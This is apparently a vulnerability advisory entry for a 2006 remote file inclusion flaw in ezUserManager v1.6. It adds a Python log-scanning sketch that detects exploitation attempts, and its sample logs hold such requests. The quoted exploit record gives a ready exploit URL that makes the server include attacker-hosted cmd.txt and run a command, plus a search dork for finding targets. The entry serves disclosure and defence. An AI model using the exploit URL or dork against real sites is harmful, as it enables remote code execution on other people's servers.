Vendor: ezUserManager
By: OLiBekaS
CVSS: 7.5 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: ezUserManager
Affected Version From: v1.6
Affected Version To: v1.6
Patch Exists: YES
Related CWE: N/A
CPE: a:ezusermanager:ezusermanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2006

ezUserManager <= v1.6 Remote File Inclusion Vulnerability

A vulnerability in ezUserManager <= v1.6 allows remote attackers to include arbitrary files via a URL in the ezUserManager_Path parameter to ezusermanager_pwd_forgott.php.

Mitigation:

Input validation should be applied to the ezUserManager_Path parameter to prevent the inclusion of malicious files.
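
Requests of the shape described above can also be flagged in web server access logs. The following Python sketch is an added example, not part of the original advisory or of ezUserManager; it assumes combined-format access logs, and the sample log lines, hosts and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "ezusermanager_pwd_forgott.php"  # script named in the advisory
PARAM = "ezusermanager_path"              # parameter named in the advisory, lower-cased
# A value starting with a scheme (http:, ftp:, php:, data: ...), "//" or a UNC
# prefix is not a plain relative include path.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
# Request target inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding (e.g. %2568ttp)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_rfi_attempt(log_line):
    """True if the line requests SCRIPT with PARAM set to a remote-looking value."""
    m = REQUEST.search(log_line)
    if not m:
        return False
    parts = urlsplit(m.group(1))
    if not unquote(parts.path).lower().endswith("/" + SCRIPT):
        return False
    # parse_qsl removes one encoding layer; fully_decode removes any further ones.
    return any(
        name.lower() == PARAM and REMOTE.match(fully_decode(value))
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
    )

def flag_rfi_attempts(lines):
    return [line for line in lines if is_rfi_attempt(line)]

SAMPLE_LOG = [  # constructed log lines, not taken from any real system
    '192.0.2.10 - - [15/May/2006:10:00:01 +0000] "GET /um/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://files.example/x.txt?&cmd=ls HTTP/1.1" 200 512',
    '192.0.2.11 - - [15/May/2006:10:00:02 +0000] "GET /um/ezusermanager_pwd_forgott.php?ezUserManager_Path=%2568ttp%253A%252F%252Ffiles.example%252Fx.txt HTTP/1.1" 200 512',
    '192.0.2.12 - - [15/May/2006:10:00:03 +0000] "GET /um/ezusermanager_pwd_forgott.php?email=a%40example.org HTTP/1.1" 200 733',
    '192.0.2.13 - - [15/May/2006:10:00:04 +0000] "GET /um/index.php?ezUserManager_Path=http://files.example/x.txt HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for hit in flag_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

The check is scoped to the script and parameter named in this advisory, so the fourth sample line (same parameter, different script) is not flagged.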

Exploit-DB raw data:

Title       : ezUserManager <= v1.6 Remote File Inclusion Vulnerability
-
URL         : http://www.ezusermanager.com/
-
Dork        : "powered by ezUserManager"
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
-
Exploit     : http://[target]/[path]/ezusermanager_pwd_forgott.php?ezUserManager_Path=http://[attacker]/cmd.txt?&cmd=ls

# milw0rm.com [2006-05-15]